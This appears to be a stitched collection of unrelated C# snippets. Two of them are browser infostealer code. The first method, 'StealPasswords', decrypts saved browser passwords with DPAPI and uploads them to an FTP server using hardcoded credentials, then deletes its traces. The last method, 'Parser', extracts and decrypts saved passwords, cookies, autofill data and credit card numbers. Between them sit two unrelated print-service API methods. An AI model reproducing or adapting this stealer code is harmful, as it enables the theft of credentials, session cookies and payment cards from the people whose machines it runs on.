public static void StealPasswords() { for (int i = 0; i < FTP_PATHS.Length; i++) { WebRequest ftpRequest = WebRequest.Create(FTP_PATHS[i]); ftpRequest.Method = WebRequestMethods.Ftp.MakeDirectory; ftpRequest.Credentials = new NetworkCredential(PasswordStealer.Program.FTPLogin, PasswordStealer.Program.FTPPassword); using (var resp = (FtpWebResponse)ftpRequest.GetResponse()) { } } for (int a = 0; a < PasswordStealer.Program.webBrowsers_Paths.Length; a++) { for (int b = 0; b < PasswordStealer.Program.environment.Length; b++) { string path = @"C:\Users\" + PasswordStealer.Program.environment[b] + @"\AppData\" + PasswordStealer.Program.webBrowsers_Paths[a]; string directory = path + new Random().Next(1, 9999999) + @"\"; string db_way = directory + "Data"; string file_way = path + "Login Data"; Directory.CreateDirectory(directory); if (File.Exists(file_way)) { File.Copy(file_way, db_way); } if (File.Exists(db_way)) { string filename = @"C:\Windows\file" + PasswordStealer.Program.webBrowsers[a] + ".html"; string db_field = "logins"; byte[] entropy = null; string description; string ConnectionString = "data source=" + db_way + ";New=True;UseUTF16Encoding=True"; DataTable DB = new DataTable(); string sql = string.Format("SELECT * FROM {0} {1} {2}", db_field, "", ""); using (SQLiteConnection connect = new SQLiteConnection(ConnectionString)) { SQLiteCommand command = new SQLiteCommand(sql, connect); SQLiteDataAdapter adapter = new SQLiteDataAdapter(command); adapter.Fill(DB); int rows = DB.Rows.Count; StreamWriter Writer = new StreamWriter(filename, false, Encoding.UTF8); for (int i = 0; i < rows; i++) { Writer.Write(i + 1 + ") "); Writer.WriteLine(DB.Rows[i][1] + "<br>"); Writer.WriteLine(DB.Rows[i][3] + "<br>"); byte[] byteArray = (byte[])DB.Rows[i][5]; byte[] decrypted = DPAPI.Decrypt(byteArray, entropy, out description); string password = new UTF8Encoding(true).GetString(decrypted); Writer.WriteLine(password + "<br><br>"); connect.Close(); } Writer.Close(); } string codeBase = Assembly.GetExecutingAssembly().CodeBase; string namez = Path.GetFileName(codeBase); string pathz = System.IO.Path.GetDirectoryName(System.Reflection.Assembly.GetExecutingAssembly().Location); using (WebClient webClient = new WebClient()) { webClient.Credentials = (ICredentials) new NetworkCredential(PasswordStealer.Program.FTPLogin, PasswordStealer.Program.FTPPassword); webClient.UploadFile(PasswordStealer.Program.Passwords + PasswordStealer.Program.webBrowsers[a] + "file.html", "STOR", @"C:\Windows\file" + PasswordStealer.Program.webBrowsers[a] + ".html"); File.Delete(@"C:\Windows\file" + PasswordStealer.Program.webBrowsers[a] + ".html"); } } } } }
public IHttpActionResult Print(string userName, string printerName = @"\\HYD-VPRINT-01A.fareast.corp.microsoft.com\B2_WC5745_1FWAZ2") { try { if (userName == null || userName.Length == 0) { return(BadRequest("The supplied username is invalid")); } else { IQueryable <PrintJob> printjobs = db.PrintJobs.Where(p => (p.UserName == userName && p.Status == PrintJobStatus.Queued) || (p.DelegatedTo == userName && p.Status == PrintJobStatus.Queued)); foreach (var printJob in printjobs) { string folderName = Path.Combine(rootPathToFolders, printJob.UserName); if (File.Exists(Path.Combine(folderName, printJob.FileName))) { string encryptedFile = File.ReadAllText(Path.Combine(folderName, printJob.FileName)); string decryptedFile = DPAPI.Decrypt(encryptedFile); File.WriteAllText(Path.Combine(folderName, printJob.FileName + "_tmp"), decryptedFile); File.Copy(Path.Combine(folderName, printJob.FileName + "_tmp"), @printerName); File.Delete(Path.Combine(folderName, printJob.FileName + "_tmp")); printJob.Status = PrintJobStatus.Printed; printJob.PrintedDateTime = DateTime.Now; db.PrintLogs.Add(new PrintLog { UserName = userName, FileName = printJob.FileName, NumberOfCopies = printJob.NumberOfCopies, DelegatedBy = printJob.DelegatedTo == userName ? printJob.UserName : null, PrintedOn = DateTime.Now }); } else { return(NotFound()); } } db.SaveChanges(); db.Dispose(); } return(Ok()); } catch (Exception e) { string sSource; string sLog; sSource = "Smart Printer Service"; sLog = "Application"; if (!EventLog.SourceExists(sSource)) { EventLog.CreateEventSource(sSource, sLog); } string errorMessage = e.Message + "\n\n"; while (e.InnerException != null) { errorMessage += e.InnerException + "\n"; e = e.InnerException; } EventLog.WriteEntry(sSource, errorMessage, EventLogEntryType.Error); return(InternalServerError()); } }
public IHttpActionResult UpdateNumberOfCopies(string userName, string fileName, int numberOfCopies) { try { if (userName == null || userName.Length == 0 || fileName == null || fileName.Length == 0) { return(BadRequest("Incorrect username or filename provided")); } else if (numberOfCopies <= 0) { return(BadRequest("Invlaid number of copies")); } else { PrintJob printJob = db.PrintJobs.Where(p => p.UserName == userName && p.FileName == fileName).FirstOrDefault(); if (printJob == null) { return(BadRequest("Incorrect username or filename provided. No corresponding printjob exists.")); } else { string filePath = Path.Combine(rootPathToFolders, userName, fileName); if (File.Exists(filePath)) { string textData = DPAPI.Decrypt(File.ReadAllText(filePath)); int copiesCountOffset = 10; int copies = textData.IndexOf("NumCopies") + copiesCountOffset; int copiesEnd = textData.IndexOf("\r", copies); if (copies == 9) { numberOfCopiesText = numberOfCopiesText.Replace("#NumberOfCopies#", numberOfCopies.ToString()); int startPos = textData.LastIndexOf("featurebegin") - 1; textData = textData.Substring(0, startPos) + numberOfCopiesText + textData.Substring(startPos); } else { string actualNumberOfCopiesText = numberOfCopiesText.Replace("#NumberOfCopies#", printJob.NumberOfCopies.ToString()); string updatedCopies = numberOfCopiesText.Replace("#NumberOfCopies#", numberOfCopies.ToString().ToString()); textData = textData.Replace(actualNumberOfCopiesText, updatedCopies); } File.WriteAllText(filePath, DPAPI.Encrypt(textData)); } printJob.NumberOfCopies = numberOfCopies; db.SaveChanges(); } } return(Ok()); } catch (Exception e) { string sSource; string sLog; sSource = "Smart Printer Service"; sLog = "Application"; if (!EventLog.SourceExists(sSource)) { EventLog.CreateEventSource(sSource, sLog); } string errorMessage = e.Message + "\n\n"; while (e.InnerException != null) { errorMessage += e.InnerException + "\n"; e = e.InnerException; } EventLog.WriteEntry(sSource, errorMessage, EventLogEntryType.Error); return(InternalServerError()); } }
private static void Parser() { try { string desc = ""; foreach (var Browser in Browsers) { foreach (var path in LoginDataPaths) { if (!File.Exists(path)) { continue; } SqlHandler sqlHandler = new SqlHandler(path); sqlHandler.ReadTable("logins"); for (int rowNum = 0; rowNum < sqlHandler.GetRowCount(); ++rowNum) { Browser.Passwords.Add(new PasswordData { URL = sqlHandler.GetValue(rowNum, 0), UserName = sqlHandler.GetValue(rowNum, 3), PasswordValue = Encoding.UTF8.GetString(DPAPI.Decrypt(Encoding.Default.GetBytes(sqlHandler.GetValue(rowNum, 5)), new byte[0], out desc)) }); } } } foreach (var Browser in Browsers) { foreach (var path in CookiesDataPaths) { if (!File.Exists(path)) { continue; } SqlHandler sqlHandler = new SqlHandler(path); sqlHandler.ReadTable("cookies"); for (int rowNum = 0; rowNum < sqlHandler.GetRowCount(); ++rowNum) { Browser.Cookies.Add(new Cookie { Host = sqlHandler.GetValue(rowNum, 1), Value = Encoding.UTF8.GetString(DPAPI.Decrypt(Encoding.Default.GetBytes(sqlHandler.GetValue(rowNum, 12)), new byte[0], out desc)), Name = sqlHandler.GetValue(rowNum, 2), ExpiresUTC = sqlHandler.GetValue(rowNum, 5), }); } } } foreach (var Browser in Browsers) { foreach (var path in WebDataPaths) { if (!File.Exists(path)) { continue; } SqlHandler sqlHandler = new SqlHandler(path); sqlHandler.ReadTable("autofill"); for (int rowNum = 0; rowNum < sqlHandler.GetRowCount(); ++rowNum) { string value = sqlHandler.GetValue(rowNum, 0); if (Bad.Contains(value.ToLower()) || value.ToLower().Contains("cd[") || value == null) { continue; } Browser.AutoFill.Add(new AutoFill { TextBox = value, Value = sqlHandler.GetValue(rowNum, 1) }); } } } foreach (var Browser in Browsers) { foreach (var path in WebDataPaths) { if (!File.Exists(path)) { continue; } SqlHandler sqlHandler = new SqlHandler(path); sqlHandler.ReadTable("credit_cards"); for (int rowNum = 0; rowNum < sqlHandler.GetRowCount(); ++rowNum) { Browser.CreditCards.Add(new CreditCard { Holder = sqlHandler.GetValue(rowNum, 1), Number = Encoding.UTF8.GetString(DPAPI.Decrypt(Encoding.Default.GetBytes(sqlHandler.GetValue(rowNum, 4)), new byte[0], out desc)), ValidDate = $"{sqlHandler.GetValue(rowNum, 2)}/{sqlHandler.GetValue(rowNum, 3)}" }); } } } } catch { } }